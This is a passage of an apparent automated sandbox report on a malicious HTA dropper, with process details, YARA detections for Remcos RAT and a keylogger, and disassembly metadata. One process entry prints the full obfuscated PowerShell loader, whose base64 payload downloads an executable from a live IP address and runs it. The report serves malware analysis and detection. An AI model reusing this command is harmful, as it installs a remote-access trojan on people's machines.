                                                                              Dec 16, 2024 17:30:28.935069084 CET1236INData Raw: 00 73 69 6e 68 00 00 00 00 6c 6f 67 31 30 00 00 00 6c 6f 67 00 70 6f 77 00 65 78 70 00 43 4f 4e 4f 55 54 24 00 31 23 51 4e 41 4e 00 00 31 23 49 4e 46 00 00 00 31 23 49 4e 44 00 00 00 31 23 53 4e 41 4e 00 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f
                                                                              Data Ascii: sinhlog10logpowexpCONOUT$1#QNAN1#INF1#IND1#SNANbad allocationkernel32.dllkernel32.dll00ios_base::badbit setios_base::failbit setios_base::eofbit setbad cast0?@K@>@a@>@b
                                                                              Dec 16, 2024 17:30:29.046210051 CET1236INData Raw: 00 bc f2 47 00 08 3b 40 00 00 00 00 00 00 00 00 00 03 00 00 00 18 3b 40 00 28 3b 40 00 44 3c 40 00 fc 3f 40 00 00 00 00 00 bc f2 47 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 08 3b 40 00 00 00 00 00 00 00 00 00 00 00 00 00 10
                                                                              Data Ascii: G;@;@(;@D<@?@G@;@GX;@h;@x;@;@;@G@X;@;@;@;@,G@;@LG;@;@;


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta"
                                                                              Imagebase:0x2a0000
                                                                              File size:13'312 bytes
                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:11:30:23
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                                                                              Imagebase:0x90000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:11:30:26
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"
                                                                              Imagebase:0xad0000
                                                                              File size:2'141'552 bytes
                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:11:30:26
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"
                                                                              Imagebase:0x810000
                                                                              File size:46'832 bytes
                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:11:30:33
                                                                              Start date:16/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"
                                                                              Imagebase:0x400000
                                                                              File size:540'672 bytes
                                                                              MD5 hash:A2D03C5333BFECCA62720CD6EE3A4DC4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 39%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:9
                                                                              Start time:11:30:34
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:11:30:35
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 656
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:11:30:37
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:11:30:38
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 712
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:11:30:40
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 640
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:20
                                                                              Start time:11:30:41
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:22
                                                                              Start time:11:30:43
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:26
                                                                              Start time:11:30:44
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 736
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:28
                                                                              Start time:11:30:46
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 756
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:30
                                                                              Start time:11:30:47
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 772
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:32
                                                                              Start time:11:30:49
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 776
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:34
                                                                              Start time:11:30:51
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:36
                                                                              Start time:11:30:52
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 784
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:38
                                                                              Start time:11:30:54
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 792
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:40
                                                                              Start time:11:30:56
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 708
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:42
                                                                              Start time:11:30:57
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 720
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 073604F7 Relevance: .0, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1708720099.0000000007360000.00000010.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_7360000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 95147af8150b91952367746f1f33ae8d4da448246054ac5ec2ed8ee87c01239d
                                                                                • Instruction ID: 292d51b97791718f0da82449b13ed88ea3216a3ef518b0d4881114bf30765049
                                                                                • Opcode Fuzzy Hash: 95147af8150b91952367746f1f33ae8d4da448246054ac5ec2ed8ee87c01239d
                                                                                • Instruction Fuzzy Hash: 9601D8F0A043059FEB518FB88896BEE7BF9AF49314F180469EA04EB285C6749842C794
                                                                                Function 06F60FE7 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1708745490.0000000006F60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_6f60000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction ID: 5fe9ad2a142b546023d3e9ae9136791d27715d02cddfec91778160030de85698
                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 06F60FDF Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1708745490.0000000006F60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_6f60000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction ID: 5fe9ad2a142b546023d3e9ae9136791d27715d02cddfec91778160030de85698
                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 06F60FC7 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1708745490.0000000006F60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_6f60000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction ID: 5fe9ad2a142b546023d3e9ae9136791d27715d02cddfec91778160030de85698
                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 06F60FCF Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1708745490.0000000006F60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_6f60000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction ID: 5fe9ad2a142b546023d3e9ae9136791d27715d02cddfec91778160030de85698
                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction Fuzzy Hash:

                                                                                Execution Graph

                                                                                Execution Coverage:4.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:12.1%
                                                                                Total number of Nodes:58
                                                                                Total number of Limit Nodes:7
